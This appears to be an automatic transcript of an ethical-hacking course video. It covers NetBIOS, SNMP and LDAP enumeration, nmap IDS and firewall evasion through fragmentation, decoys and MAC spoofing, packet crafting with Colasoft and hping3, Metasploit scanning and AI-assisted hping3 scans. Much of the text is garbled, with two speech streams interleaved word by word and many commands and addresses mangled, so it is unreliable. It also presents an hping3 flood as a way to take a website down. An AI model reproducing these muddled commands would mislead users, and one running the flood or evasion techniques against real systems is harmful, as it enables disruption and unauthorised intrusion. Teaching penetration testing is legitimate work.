resolution of defective that is split automatically it was very high because this will split extract goes on let's see okay so you need one so now once this now like here use a command prompt type nd so where BIOS record here have a content which was displayed here is get connected where I this mirror connect this one ether okay then skills active so use factory right here now the our are even is admission this condition NetBIOS the win line is it is strat and use so you yeah, once you type strat minus z you get switch connected so yes this process modify some stuff from so something so we just do make that's so now we are going as NetBIOS using NetBIOS meta. So this is a tool the NetBIOS embedded. It will start like applications and options and use the types. Now we would like to implement enumeration NetBIOS meta for a any type of application. Now we use this enumerator and we only Windows now Windows and Windows 11. So we can't do this one this so we can find it. So just for target I don't like enter target is now the NetBIOS enumerator there and discuss here all the endpoints. Then you click on the perspective for the activities now I show you as a BIOS here with the source also you can minimize it free you can just get this is advice you can use those otherwise everything like that so this service price so it's also the same so then instead of having and raising and network machines to type the target. So now we stop NetBIOS using any so we can stop using NSC script. Now it's a script for service shares use others like yes for your exchange like I just delete where's script now just so apply you will be started yes I make it up to finally and we start off see then that's it now it works outputs minus x service version minus b enables the output script that NSC functions here then there's using hosts so there and the host that come all this So in this same case, now we start to scan the unified map. My SNMP port is 137. Then we just try to say and it's like you just press your address. Here we is scan the demonstration information using SNMP. So now person using SHA, simple management protocol. Gathering information to SNMP for SNMP to extract the information more than so if is enabled. Let's go to our switch here. Yes. Now let's wait to get work. Now get the now in this case scenario also same scenario. Like someone let's now it's specifically let it get for VP is put as what I would like to. Yeah, so let me stop what this type and SC put is what is what targets back. So that's better than some. Let me just that now you can see with the port is so you can here is such strategy here you are the now so we have SNMP is running a vision which explain the engine about that etc. But like to utilize as we targeted errors. So that's also here with the extra S6 is used. But we are able to compare this. The target should not have value of views. It's not a value of it. So the SNMP integrate listing assistant information from settings. I just go back. Now I just let me go back to 6 what speech idea. So copy yes map minus to try here but not like this plus I then try it that this is good can get net information so every here we not it here now try try to so now that's let's look what is the information I can get. So it's just but the when the term not applicable makes it so send request may be not able to so then further use information to discover this in like them are discussion of security. So now everything of is using perfect network GUS innovation actively like for discovery and in SNMP get like to get it done is first we will do come back to here. So no this so I try to do yes let's and install it. Nice. Yes. Now, like a it to be my task with 1.8 and it just to tap here. That can if you want right click option. Nice type here as remove SNMP. Now, same kind of description LD. It's on small. Not small. It is place like things. Start for scan. Let's be scanning. Here, where this you can write any spread map Android call frequency will be ministry LD. So once you done, scan. Okay. Yeah. So now click on 1, 2, 3. So all is on is the macros is not about everything. Every information is in here. So it was everything. So but to have any offline shared or something so this like is available yes not so we would like the we get a clear information we see here post frame types this one type location here anything fine after this that's it. So you can just open this STL I can try to cut it and every so I do a now we open something else as try to use again put the can connect as a little numbers 21 but what will out there we get part of it as now if there is can make it that was not available that was let's take this we can something check now we like lost Selected port not now. This opts to emotions immersible for activities such as image shadow, echo remote deals, features are the selfish as say context. So, sample short filmation the sub now, that problem is SNMP using as SNMP. So, SNMP SNMP use SNMP is on formatting and translation models. SNMP simple document. SNMP is a command that is data from any device by iterating the measurement when like this. So, you do this. Well, let me just let me explain. Let me just put I see SNMP that to utilize us. Like this, so we discuss the version on SNMP. See as advantage. So I just add this characters only. Let set no response. So to us SNMP because I want to guys any other not ideas. Let me close this screen. Now let's come back here. Let me close. So if it well you don't need it effect this we get here. So not measure. So it's enter as SNMP wash one C with the target. So this right here. You enter display the function. Now it's with public the set a set of strings. The results will be played out here. That's which transmitted evasion result, including in server parameters. The control version of estimation using SNMP. That's now perform using full and perform SNMP using its range. This script can extract information about SNMP such as sensitivities are much here. Like here, let me not this right here. Now just type here. Like to put here as one export script. It will be heralds. 20 lines here. Where this was expected, but yet as SNMP service. Now if we the anyone like we get like right here, we try this. Let me so yeah, so it open also we get me. So it's about SNMP. Let me just look here. So we have only because the system have a high security. Thus we not get any out here. So we have any boxes here. Number change of I just type here. Type one was here. So you have to get takes place. Now let's go back here. Yes, 4.6. Yes, 4.6. We would like to back here. Let's try 21 so likes. Okay, just be you can replace types. Let in results. So you can't able to pop out the picture. Let show you here. If you like the script so to display it as like very info are things. Then you type as again because that and address. Here that displays a port with a link. Now type as port 1 SNMP window 2 is of enter. That is stable. Here here. Now again we try and embed that IP address. You can get all the you get all the weeks only you can get very easy. You have to rest like watching that. So now active directory. So what is active? So active allow view. So now is active. So view like so get directory. So direct flow. Now Peter files Microsoft active directory. So no problem. So where that active directory domain controller rules so active. So it's directory. Where we can SEH. So if you like to get this active documents, so if you like to come back here, so we write everything. Manage. So we want to get this one. Now let's get that. So so I have here. Explore
find that this is so few lines. Now let we just this attract noise. It's going to cut if I had items here. I'm not target item. Now then this is the name. So it is like how you can pick using it target 1.18.1. Then you just enter what so I just there we so it's enter all that here. That's once you have entered the direction look or what is your thinking. So before then rewrite so before that then know how you are moved. So also for attributes so that use the definition of any active target. You can use so LDAP administration or CEH so which you can get the enumeration can be automatically using and to select for answers. So here now. So first let me just put that. So so let me just this since in here. Now I just type here. Now let me I just here as now type here as config. This is my type error. So let me come back here. Now let I open that tab. So let I just make simple. Now I just write a nmap SU. What is a type and hero target here? 1.168.8.70. So that's so that's where here. So it was a filter. So as SU perform say that I put where it was open as 89 for LDAP enumeration. So there it was for LDAP enumeration. Now it is open. Now what we would like to hear is now we type as nmap port is 89 minus type as a script LDAP bullet. Now just type as script yes then just type LDAP dot base equal to I just type here as name equal to as I will put here as now let me I would like to put here as domain equal to I will put as domain as Metasploit. Now domain control equal I just take here that's it. Now let me just use target icons 92.3.18. So it was filtered with the target IP address but my system is very secure with my laptop is very encrypted. So here event is very encrypted. So yeah I get that's here. So if you so what is your similar like that so it will be displayed here every when right here closed and it was not it was not filled with IP not closed because it purchase so that's what it was. So this tools revenue of when using N2 that for integration IP search. So IP search is a powerful tool in LDAP database. Search method of the LDAP so create objects attribute LDAP server. Now first we just come back a color. Now you just try LDAP search minus h for by the host is enter my address minus is the simple authentication. Specify the scope and this name text. So so let me type here. Beside host minus access is naming context. So here where we have I think so where is invalid for h. So in this so we have make a straight no we let make type of from let would like to search this workout. Now, we just need to say LDH minus H for host. Then target IP address is, I just enter my target address is 192.168.72. Minus X minus S based on context, so but it was not even a rightful information. So, but he get a rightful information. There, place. Now let me just try here again. Now we just try here as with the Pentastrap. Let me just try here. Now we get again an error, so we don't need to go over there. So in this next, we have got a XYZ thing. So after that, we just need to go to for a targeted a domain here, like the CH domain control is .com. So you just put I have presented in my active directory as a Pentest club, then PCPL.
we would like to look here. In the view page source, I didn't get any useful information at all. Now, let me, I just close this. Now, we would like to try here as, we would like to try here as, let me just go here as, I just put here as a directory hoster as with HTTP.
So,
And
Nmap results is like, will take a lengthy time process, but you just need to wait with patience for a Nmap results. Then and only you can get.
There is nothing else. Now, you just put here as nicto minus h HTTP and terror target IP address 192.168.18.129. We would like to try here with the nicto. So I didn't get anything else. There is no even robots.txt file also. Okay, this is quite useful information for us. Now,
You can look here
we would like
the
to
open
try
ports. You can look here a lengthy of open ports which was displayed here. OS scan results reliable because we could not find at least one open and one closed port of OS fingerprint. Not ideal because of missing or closed TCP ports. So the results is incomplete. So no OS match for post. Okay, no worries. Now we just clear this.
So it's with us only the
Now
APN.
we just type here as a nmap. We would like to utilize a script SMB OS
So
discovery
we would like to study here
dot
what's the
NSC.
useful information we can
We
get
would like to
here.
utilize this
Let's
script SMB
we would like to focus here.
OS
So in this
discovery
case,
dot
we not
NSC
get a useful
and hello
information.
target IP address
We would like to go for
192.168.18. Oh,
We
sorry.
would like to go
We
here
would
as
like to put
a
this
3128.
IP address.
So
Let's
it's
come
like
back.
a error. The requested URL could not be retrieved as a invalid URL. Okay.
I would like to
So as invalid
get
URL. Now
this IP address.
we would like to try here as a we
We would like to here.
We just put here as a curl.
So
Then you just
the
put here
script
as a
specify the
proxy.
customized script and SMB equal to OS discovery dot
Then you just
NS.
type here as a
It will attempt to determine the OS
then enter our target.
computer name and domain work group and current SMB protocols and ports.
31
This
3128.
is the only everything
Now, let me
was
just put here as
described
HTTP.
here. So this concludes the demonstration of discovering the OS running on target system using a nmap. That's
I think I have made a mistake. Let's
so now we have performed OS discovery using Unicorn scan. So what is Unicorn scan? Unicorn is an high performance network reconnaissance tool designed to collect information about system and services on network. It is particularly effective for a large scale scans and offers a unique feature such as asynchronous scans, a custom packet crafting, and fingerprinting capabilities. So, why we use Unicorn for OS discovery? It supports for high-speed scanning for large networks, advanced packet crafting for fingerprints, voice detection-based TCP/IP stack analysis,
So let's where we can get
supports for non-standard and custom protocols. Now, let's we just open the your Kali Linux mission. I just type
so
here.
let
You
I
just
would like
type
to
here
open
as
this
exit.
as a Python file.
So I just type as
Let's move
unicorn
on.
scan.
So let
Then you
I
just
would
type
like
here as
to
minus help.
copy this.
So when you
let
get
I would
help
like to try to
here.
get here as
Now
a deploy
we would like to utilize
and
immediate mode to display the things as we need to find them. So we would like to utilize this one. Now let's come back here. Just
now
here.
let's
You just
let I
type
just go
unicorn
here as
scan
post.
targeted
Now
IP
you
address.
just
So
type as
if you want to utilize the
now
this
let
IP address
there
only,
is
so
a
we can
requirement. So
utilize
let me
the
just
same IP address
install
only.
the
Now we
requirements.
just put here as minus IV. Let's even look here. where a TCP port which
So,
was available here,
let me
instantly we
try
have
to
got
solve
here
this one
which
first.
port is open for here. Now, the scan results appear displaying the open ports with the TCP along with the TTL value of a 64.
Now,
Here, the TTL
I
value
just type it as this. We just type
acquired
it as
after the
15.
scan is 64. Hence,
Install
the OS is
R
possibly a Linux-based machine or
requirements.txt.
Google-based machine.
Now, requirements is already satisfied. That's
So,
all.
using this information,
Now,
attacker
just
can
type here as
formulate the
a
attack
Python
strategy
as
based on the OS of
expose.python
target system.
and minus minus help. That's it. So you just need to set up a proxy.
So,
We
this
already
concludes the
have our
demonstration of
proxy
discovering the
targeted
OS
IP
of
address.
target
So this
machine
is our
using the
proxy
unicorn
target
scan.
address. Where is this?
So, this will display a
And
lot of type. So,
and we
now
would like
later
to
we will
specify
like
our
this.
target and put for all targets. That's it. Now we would like to try here. Just copy this one. Now,
So guys, now we are going to discussing about a scan beyond IDs firewalls using various evasion techniques.
Then
So,
let me just press here.
what are IDs
Then
and firewalls?
I
So,
just
what
put
is
here as a
IDS?
target is
So,
127
IDS defines as
one.
institution detection system.
Uh,
So, it monitors the
then
network
we
traffic
just
for
put here
a
as I would
suspicious
like to look
activities,
here as a
alter
R2.
administration of potential institution.
Let's we would
And
like to
what
look
is
here
a
as
firewall?
421
It
is open,
filters a
422 is
traffic
open,
based on
480 is
predefined
open.
rules,
So this
block
Telnix
unauthorized access to
CTF
the system.
have inbuilt in the inbuilt
Why
CTF.
we use
So it's quite
evasion
a difficult
techniques?
way to
Yes.
gather
Evasion
this one.
techniques modifies
So
scanning
now this
behavior to
was
bypass these
done. Now
protections
we would
and
like to look here.
enable
We have got only
stealthier
three ports
recurrences
where
like
uh,
uh,
port
block a
20
suspicious packets,
and
detect and
21.
alter
That's it. Now we
administration
would like to look here
above a
is
port scans, a drop a packets from a repeated scanning attempts. Like if you try any type of targeted website, if you try more than 3 times or 4 times, they will lock one day. Like that. So there is an evasion techniques and they have set up IDs on firewalls. So we would like to bypass this one. So for that, now we would like to utilize here first. Our first task is let's we would like to come back to our kernel Linux machine. Now let we just
so I
open the
think
terminal.
we are not getting any useful information from
Now
this.
let me just make
So
that a little
now
bit
let
quick.
me. I
Now
would
just
like
type your
to
sudo su, enter your
just
password.
with
Now
this.
just type your as nmap -f
Now
for
let me.
switch to use
here
a
as
split of
let me
IP
just type it as here
packet
just here
into
as NAND
a teeny
as
fragment packets.
AVPC as
Now I just need to
proxy
enter my targeted IP address
chains dot
192.168.1.127. That's it.
config.
Now
I
the
think
packet
so.
fragmentation refers to the splitting of probe packet into a several smaller
Yes, so we would like to go to
packets,
here.
fragments,
Then let's come
while
back
sending
here.
it
So
to
let's we would like to
sending
look here
it to a
is
network. When
uh,
these packets reach to the host IDs
here
and firewalls, behind the
where is
host
this
generally
a source
queue
file.
all of them process them
Then
one by one.
we just put
However,
here as
since this method
a
of processing
HTTP
involves
and
a gather
directory
a
address
CPU consumption as well as network resource,
192.8.169
the configuration of
is
most
another
IDs
one.
it
What
skips
you
the
just need to put
fragmented
here as
packets during the
a
port scan.
3128. That's it.
Now, for this,
Now let's just
first,
type
we would
as
like
a
to
control O,
come back here,
control
a
X.
Windows.
That's it.
We would like to
Now
open a Wireshark.
we just put here as a
First, we would
proxy
like to go to a
chains.
control panel, go to a system and
That's
security,
great. A proxy
uh,
chains. I
Windows
just put here as
Defender or
nmap
Firewall.
and
So,
target.
this
Address
I noted out turn off this. So, it's available here.
To
So,
port
just close
is
this. Now, you
21,
just open a Wireshark.
22. That's it. You can look here. A port 21 is closed,
Now,
closed.
here,
So
there
how
is
we
an
would like to
Ethernet
open
0. You just click on run this.
this one.
There is nothing else fragmented. Now let's come back here. Now just put this.
So where
Now let's wait for the nmap result.
I think I not
The
getting
same
here
only as displayed here. Now let's go back here. You can see
the right
where
results.
a fragmented is captured with my kernel Linux IP address. So let me just close this.
We would like to try here
I
as
just close this.
I just type it
where
as
you can
here.
see here easily
Everything
can
required as
identify.
proxy chains.
But here I
Then
got
let
a
me just
TCP
put here as
request.
a local host.
So
This is also
a
a same
multiple
thing, but
packets
I'm
it
getting as
was
a
came
close.
here. Now let me, we would like to start here as another one. Now
Proxy
let
chain.
me,
So
I
let me I just
just
type it
click
as
on
a port
continue
21
without saving.
minus
Now
S
let's come back here.
sync.
Now
We would like to look
let me
here.
just type
But
here.
I'm
You
not
just type
getting
a
here
nmap
the right a targeted
minus
as my
G80
this one as
and I want to enter my
nano with
targeted
the
IP address
etc with the proxy chains dot config. So here
192.168.18.127.
is only the mistake
So
where I have done.
it was started. In this command, you can use minus
EFT,
T
so
or a
let's
source
like
port
to look here.
options to perform a source port manipulation. Source port manipulation refers to a manipulating an actual port number with a common port number to evade IDs on firewalls. This is useful when the firewall is configured to allow a packets from well-known ports like
So
HTTPS, DNS,
here
FTP,
as a
SSH,
sock, so I
and
just need to
Telnet,
present
everything.
for this.
Now, we would like to look
So
here. We have got the
if
results. Now, we would
this
like to switch
does
to
not present, then it will
Windows.
not going to
Now, we would
out.
like to look.
Proxy
So,
list,
we just
add
need to
proxies
close
here.
this.
So
You
we
can look
just
here.
add this mandatory. If you not
It was
enable
come
this
with
as
multiple
port,
things
that will not going to be
where
work out here.
which is
So we
what
just added this target like
get
that.
here.
So
But I got it in green, but I
now
didn't get any
let's we
type of
just try
red
here as a control
here.
O, control
So
X.
where you
Now
can
just
see
try
here,
here as a
it
proxy
was
change
captured.
and map.
TCP port numbers
It's also a
80.
closed.
So where here TCP port 80 where it was manipulated. You can observe very uh, clearly from here. So that's it here. Now we would like to do here as another one. Now just continue without saving.
So
Now
why it's
just
not taking
come
here?
back
Let me
here.
I just enter my target. Right?
Now we just use a nmap minus
So it's also
MTU
the same thing,
8
but
and
we are
enter
getting
your
it's
target right there.
everything is close.
192.168.18.127. Now we would like to look here. Now it was get a fragmented packets. Now you can see
So
here
we just need to sort it
minus
out this one
using
how we
MTU
can
is a smaller packets are
sort it out this
transmitted
one.
instead of sending
Let's
one complete packet
we would like
at
to
a
look
time.
here
This
as
technique evades a
come
filtering
back
or
here
detection mechanism,
as
enables
a
the
nmap
target machine. Can look here.
pen testing. So this is a
Now
different.
let me I just close this.
Pen testing
Now
is
let me
tracked.
close.
So this one only.
So I want to quit without saving. Now
So,
let me I just open a
let's
Wireshark.
curl with the proxies with the
Now
proxy.
before this running, now we would like to run as
So
another command.
let's
We use type here as nmap minus d rnd. I just put as a 10
this is an
untargeted IP
proxy
address.
chains with nmap minus st.
80.127.
So
Now let's come back.
let me. I would like to try this.
So in the
This
Ethernet, I
nmap
just
with
want
the
to
proxy
start.
chain that scans for the local host.
Now
I
I
would
just
like to try.
enter here.
Let's
So
we just
minus
try
D
here as
performs a decoy scan. Minus
let's we would
RND
like to look here.
generates a random and
What
non-reserved
we can
IP
get
address. Now you can look here. It was generating almost all a plenty of non-reserved IP
Now
addresses.
it's open as with the local host with the port
You
80.
can look
So
plenty of
in
things.
this case,
So the
we want
IP
to
address
get as
decoy
open this
technique
one.
refers the
So,
generating or
once,
manually specifying
when
the
I
IP
type under
address
the
of
root
a
privilege,
decoys
so
to
that's only
evade
giving us
IDs or
a
firewall. These techniques make it
this
difficulties for the IDs or
only for a
firewalls
Linux.
to
So now it's
determine
giving
which
entire
IP address
now
was
let's we would
actually
like to try
scanning
here.
scanning the
We
network
would like to try
and
here as
which
a-
IP address were
Like, we would
decoys.
like to try here
By
as-
using
we
this
just
command,
try here as
Nmap
We would
automatically
like to try
generates
here
a
as
random number of
proxy
decoys
chains
for the scan of randomly positions the real IP address
Nmap
between the decoy IP address. So you can consider decoy as a is like a fake IP address. It's like a BitTorrent.
and 22.
So it's coming from a
So
torrent.
this
You can
is
see
giving
a
us
request
close
argument, request get peer, version
proxy
type. So you
chain.
can't able to get in the
Let
peers.
me I just put
Same
here
like
as
an
a
onion websites.
localhost is also a
You can look.
same thing.
So
That's
let
also
me. I just
now let's we
close this.
just put here as
You
minus
can look now the
SC.
fragments
This also
where
is
which
same.
targeted IP
Now,
address. Everywhere
how
there
we
is
would like to go
a
further
bulk
here
of IP addresses.
to get this.
They don't know who they actually is pinged or where the it's came from. So you can see here, you cannot able to identify anything else. Yeah. Now, now we would like to
So we
spoof
have
now a
there's
MAC
something
address.
missing
Now
here.
let me I just close.
Now let's we would
Let me
like
just
to try
close this.
this.
Just open a Wireshark. Then let me just come back. We just type clear. Now you just type it as nmap minus st minus pn spoof mac 0. Enter the target IP address 192.168.18.127. So before spoofing, now let me just switch to here. I just start a listening. Now just come back. Then you just enter. You have specified some options that requires a raw packet to access. This will not be honor for TCP connect
So let
scan.
me we would like to try here
So
as
now let's
a
come back here
proxy
where
chains.
it was spoofing now the MAC address.
Proxy chains as a
So the
nmap
MAC address spoofing techniques involves for spoofing a MAC address
for as
of legitimate user
and
of
just try here
network.
as
This
a
technique
localhost.
allows you to send a request packet to a targeted machine
So
and
it is
network,
close.
uh,
How I
pretending
can
to be a
open
legitimate
this one.
host.
So let me just try here as clear.
Let me just close this. Now let me I just why
So if it close, let's we just try here as a FTP. Then let's we just try here as 127.0.0.1.
you can look this
Connection is
transmission
refused
control
because it's
protocol.
closed.
The flag
Okay.
window
I
size
just try
is
here as
251.
Let me just try here as
That's
clear.
great. Now just
We
close
just try
this.
here as a
Internet protocol.
proxy chains as
Destination address.
LFTPD
Source address is Kali
as
Linux.
interrogation.
Destination address is Windows. That's it here.
Username
Uh,
is
time to leave is 64. This was identified here. So this is in decoded. Or so this concludes the demonstration of evade IDs and firewalls using evasion techniques of Nmap. So now we are going to discuss about create a custom package using Colasoft Packet Builder to scan beyond the IDs and firewalls. So Colasoft Packet Builder is a network tool that allows a user to create, edit, send a custom packet over the network. It can be used to craft the custom packets for testing a network security, evades IDs and firewalls by modifying the packet headers and payloads, simulate a specific attack for a penetration test. So, why we use a Colasoft Packet Builder? IDs or firewalls often rely on patterns to detect a scan or attack a custom crafted packets. Can bypass these patterns by modifying a packet headers or payloads. You can test them, firewalls and IDs handle for unaccepted traffic. Now, I just open, sorry, I just, we would like to install this. So just let me just install. Okay, next. So once we would like to install this, now let me launch here as a Wireshark. Click on next. Finish. Now, this one is not tracking the movement, so I just close this. Now, we would like to start for a capturing. Now, we just leave it this. Now let's scroll down, scroll down, scroll down. Now, here is a Colosoft packet builder. I just type yes. Let it launch this a Colosoft packet builder. Now, it was a launch. Now, we just close this. Now, where is this? Now, click on adapter. Now, it came here. So, just click on drop down. So, which one you would like to get here? Like for Microsoft, VMware, I just need to put as a Microsoft. I just click on OK. Now, click on Add in the menu. Just put as it is. Get ARP packets, otherwise IP packets, otherwise TCP packets or UDP packets. So I just need to select only ARP packets. Now I just click on OK. Now, which was displayed here. You can view here the packets info, number of packets, packet length, capture length, delta type, Ethernet to a destination IP, MAC address, source address, protocol type, address resolution protocol, hardware type, everything. So where we have got all these things. Colosoft Packet Builder allows you to edit and decode information in the two editors, a decode editor and X editor, located in the left panel here. X editor. Yeah. To send the packets, here now just click on is. Now just you would like to look here. This is one. Now first mode, no delay for the packets, so just try to send. So you have sent all the packets. Now when this ARP packets is broadcasted in the network, the active missions receive the packets and few start responding with an ARP replay and evaluate which mission is responding to the ARP packet. You need to observe the packet and capture the Wireshark tool. In the Wireshark window, you just come back here. You just look here. Where you just filter ERP. Which was responding ERP. So this only. You can, that's it. We have got here. Now switch back to here, a Colosoft. Now just close this. Now you just export this one file, export all packets. Now we just save packets.cat. That's it. Now we would like to close this. This also stop without quitting. Now using this packet scan, attacker can use this packet to create a fragmented packets to bypass a network firewall and ID system. They can also create packets and flood to the victim. This is very large number of packets, which could result in DOS attacks. This concludes the demonstration of creating a custom TCP packets to scan the target host via ID system. So now we are going to create custom UDP and TCP packets using hping3 to scan beyond the IDs and firewalls. So we already did a previous tutorial as hping3. hping3 is a command line packet crafting tool, often used for a network testing and troubleshooting, scanning network stream, firewall and ID evasion, and packaging. Now, let's walk to directly a tutorial. Let we just open here. Let's open the terminal. Before here, now I would like to just open the Wireshark. Now I just switch this one to I just switch here, come back. Now just type sudo su, enter your password. I just make it a little bit big. Now just type clear. Now please try here as a hping3 targeted IP address 192.168.18.127, and you specify UDP and you just type RAN data file. Now 28 address 500 data. Now we would like to look here where you are getting here UDP. That's it here. Now you can see here minus UDP specifies the UDP packet of the target host, minus RAN source enables the random source mode, minus data specifies the packet body of the sites. Now we would like to expand the packet details. So where is this? So I just put this. Now this UDP and data size. You can see here a length is 5. If you specify any type of length, that will be displayed here automatically. So you can make it as big. You can expand this and hash also here. You can observe everything here. Now we just try as another one. Let's come back. Go to here. So we just quit this before this. So I would like to close this. Now we would like to try this hping3 minus enter your target address 192.168.18.127 port 80 minus C5 minus S specify the TCP scan request on the target mission, minus P specify the assigning the port to send traffic, minus C is the count of the packets to send to the target mission. Now we would like to come back here. So we would like to start or continue without saving. Now I would like to try to send here. Now you can look here where it was come, where this is the you just consider this one transmission protocol. You can look here acknowledgement number where you can get it. Now we would like to do a flooding method Okay, now just close this, come back. So 5 packets meter, 0 packets is that's great. Now just try as H3, enter your target. IP address 192.168.18.7 minus minus flood. So this will flood enter this machine. Now let's be just try here. You can look, you get nothing else here. Now just enter, flood in mode, no replace will be shown here. Now switch back to here, you can look here, a TCP flooding. You can see a lot of flooding automatically. So the TCP packet streams is displayed here. The TCP packets such as the source and destination of the capture packet and source port and destination ports and etc. Can look here, it will flood automatically. 1 second you get like 100,000. 1 minute you can get 100,000 requests. So if you get 1 minute as 3 billion or 5 billion requests, any type of targeted website, that will be destroyed totally the website. It's not going to be work. You can also use the packet crafting tools such as already did that one. Collects of packet builder we have done before that one. So this concludes the demonstration of evading the IDs on firewalls using various evasion techniques. So now we are going to do another is scan. So scan a target using a Metasploit. So what is Metasploit? Metasploit is a powerful pen testing framework that enables a security professionals to check a network references, scan for vulnerabilities, exploit discovered a weakness in the target system. Now, we would like to come back. Just we would like to just quit this. Just type here as X. Just type here. In this, I would like to close here. Just close. So once again, let me just check here as task manager. That's great. Now, let me would like to come back here. Now, we just type here as service PostgreSQL start. Now, enter the password. Now, type as insert console and enter. Now, let me just type here. Now, here, we just type here ADB status. PostgreSQL selected but not. Okay. We just type here as exit. We just type here as clear. Now, what status? MSF DB init. That's it. You must control S-U. MSF DB init. Now, this is already started. Now, let's create a database schema. Now, let's just type exit. Now, let me just type here. I just type PostgreSQL, then type restart. Enter our password. Now, this was done. I just type MS console. Now, let me just here. Now, just type here as speak status. It was selected with the PostgreSQL. Now, great. Now, we just type here as a. minus pn minus ss minus a minus oops. I will create a state that print interrogator. I will run into state dating dot provide. Now, for starting, NMOP begins getting a submit and displays the result. Take approximately a few minutes. Let's we would like to wait here. Then we would like to go everywhere once we get a submit. So we just look at 18 seconds remaining more. Since we take it, let's wait for this. Now, results is displayed here. Everything. Now we would like to hear about 80. And this is his tour. One where one is available FTP, telnet, domain 8022 OS system, and where we have got a lengthy time. So we have got a lengthy of results here. We have got all the results here. Now just type as db import test. So where it will import all the tests here. Now we would like to look here. I show you here. db import a test where we have input all the tests. Now just type post. You can look at post. What is it's available here? One with the maps. My current license is not presented with maps. It's interesting thing. Then that's it. My Windows 2009 presented the maps. Now just type as a services. So we would like to know service. Then post prototype name F, which was described here. So if you want to try anything else, support scan, you apart from this, you can do a scan. Otherwise, so you can utilize codes. I think that here. Now we would like to this. Now, type here as a port scan. Now, we have seen here port scan. And try which one you would like to do here. 3 for X must scan. Now, just try show options. Just type as set R posters and Toyota Federals to run on state 80.0/4. Just type here as run. I just put here as control. I just type run. And more is come here. I just type come back. Just clear service and just type as scan. I'd like to use as 6. I just type show options, set interface. Example, I just type set ports 80. Now set hosts. Now just 92.18.0 to 24. Set threads equal to 50. I just type done. The operation is not happening here, right? Because it's not going to be at prefer not to say. I just try to come back. Now we are doing here the right things, but so this is enough. So what else required to put here are equivalents. So this information can for a vulnerability analysis on both service recovery and the IPO. This controls are demonstrated gathering information about one host of services on active information related as a set of other set. So now going for a scan with that. So we would like to do first a hping scan air. So an attacker as a hping to scan a targeted IP address with air. So how we would like to do here? So you do as a line comments the simple easy way. With air, so it's quite easy way. So you just need to telling as a machine language the AI mode. So you can do the right work. We would like to go here as let me just write as here. We would like to say SD. Is put here a now here is not a printing, here is for scan network. So it's a scan and here is a now utilize as the use hping3. So it doesn't anything else. However, required to perform ICMP scan the target address and route IP address 192.168.18.21. So presenting IP address and after 10 iterations. That's it. Now it will ask to execute this. That's it. Sorry, I just put here execute. Open sub operation is not permitted. So I just need to run under the SU and enter password. So this is given you command also. So you try that command also. Let's so for under the root. Let me try SGPT. It's not for let me as exact. So now let's try here as hping3. So I have presented to perform ICMP scanning on the target IPS and stop after 10 iterations. So I just put let me just put here as one. Let's you go for as an execution. So it's not presented here. Why? Because you just try here as sometimes ChatGPTs make is a error. So you just need to mind that. So you need to put as much as ICMP is called target right. 121. ICMP. Now let me just put as a count. So I not on the count there as right. So I put here as a 10 3.18.8. Now until the parameter. So right, if you can provide you get the right things. If you provide the wrong thing, it will not result. So ChatGPT lets the terms and so we just need to the right prompt. That's it. So now let's try to give another one as a right prompt. Let me just put as a exact. Let me just idea. Just put as SD. Just put a chat. Scan. Just put a shell. Just use ping. So I don't want to go here as like I would like to use as I would like to put as a HP. So in this was a wrong. So I would like to put here a shell. I would like to put here as a run a hping 3 as a scan on port 80 of a target IP address 22.168.21. Let's would like to sorry, let me start with this. And target IP address. Now let's back to look here. Let hedging must A as a acknowledged cannot open a raw socket. Operation is not permitted. So this is not installed under the root as LPT. So we would like to look at sudo su source as a virtual and act install here as it install shell utility. So yes, that is, let me just back it as else. Again, I put my API. Let me. I would like to utilize here start as API key. Let me just close this. Now it's back at my first here. Now once it's done, we get anything here. Now I would like to APT. Just as a chart hatching. Nice to play. Run hatching. Acknowledge port 80 of a target IP address monitor instead 8.18.21. Let's do it here. Oh, sorry. Say tap. Let's move here. We have execute. It's 48 and 0 bytes. So it will go as a result. Now, if you as a result, now if you look here, say what in this sorted system, let's you can as this is my Y2. We would like to open this. Look here from targeted. They are sent ADC packets from here. Heavy ADCP packets. It's also coming your file line side. So I don't want here switch. So for reference only, a transfer protocol. There you have everything. That's it. So that's it here. So it will present the data here. That's it. So this is how you can do that. So need to try more. Then only you can get here. That's it. I just double C. So I'm going to discuss host is with A. So what is with the host design? Scan target network to host and place address in an effect to scan a 1.txt. Run the fast and compressive map scans. 1 with a load proceed and run results with a scan2.txt. Use a map to for ICMP done before multiple things. Like this a simple kind. I have to go back, so let me just type it as scan. Let me type it as a SGPD. Just as chat, you just put here as scan. You just put here as just put here as network base to run 0 by 20. Otherwise, you can add 16 also, no problem. For active stress, so I am trying only my local that and place only the IP addresses in file as a static. Oh, sorry, let me just check out static screen. Now let's for here as nmap minus s. So whether you view as right results, let me execute. Now you can look here. Is put here as that is static. Where you have entire, you can look here 92.1 towards 61, 24, 124, 6, and 120. So these are the IP addresses in most of. So in real scenarios, you just put you are scanning the target area. So target name is GitHub x.com otherwise it's 0. It's filtered. So you cannot able to access except the port 80. So port 80 is also open, but he not yet open here. So here the results is coming. You can look here. Everything the results you can look here. The targeted port, everything. Let's move back to So these are networks with AI. That's it. So there is nothing else to start from this. So if you want to try as each and module, so you just need to try by executing. So what else you require with SGPT? Then it there. So it's take a lengthy time process. That's it. So the detailed scan and this print for a live hostess, then it's printing the results. And echo, it's the same. That's it. The scan is completed. That's it. So 66 all. This is their MAC address where you have got everything here. So we have completed already the scanning the networks. Now let's for us enumerations. So now we are discussing about another chapter named called enumeration. So what is enumeration? This is enumeration. So enumeration is a crucial phase in ethical hacking. It involves a systematically extracting details, information about a target system, network or application. The purpose of enumeration is to identify and gather a data such as usernames, machines, names, network resources, which can be used to vulnerabilities or weak points in the target. Enumeration typically follows phases in the penetration industry, a life cycle. It is often the first actively engaging with a target to gather a specific information. Like what is most important in enumerations? Like enumeration is important because it's the foundation for a deeper penetration into a system. Without accurate enumeration, hackers cannot proceed to exploit vulnerability. So, the key benefits like identify open port services and running applications, discovering a username, shared resource, and details, gaining an understanding of target network structures. Like we can see here, like a network user accounts, network information, services, and operating systems. Like services, we can see FTP, DNS that may leak valuable information. Operating system like OS version, service packet, packs, and patch levels. In network informations, we can look like a domain details, routing tables, and SNMP data. User accounts, so like username and group information from the system or directories. Network resources, like a shared devices, printer, and other shared resources. That's it. Now, typically we can do like NetBIOS enumerations, enumeration, NMP enumeration, DNS enumeration, and LDAP enumeration, and SMTP enumeration. And also we can do a common techniques uh, we can use here, like a banner grabbing, port scanning, SNMP querying, default credentials, and bullet holes. That's it. Now we would like to hear this is a just introduction part. That's it. So now we have to do our first task is here. So perform NetBIOS enumeration using Windows command line utilities, SCMD. Now, NetBIOS enumeration is the process of gathering information, shared resources, user account, and target Windows machine. 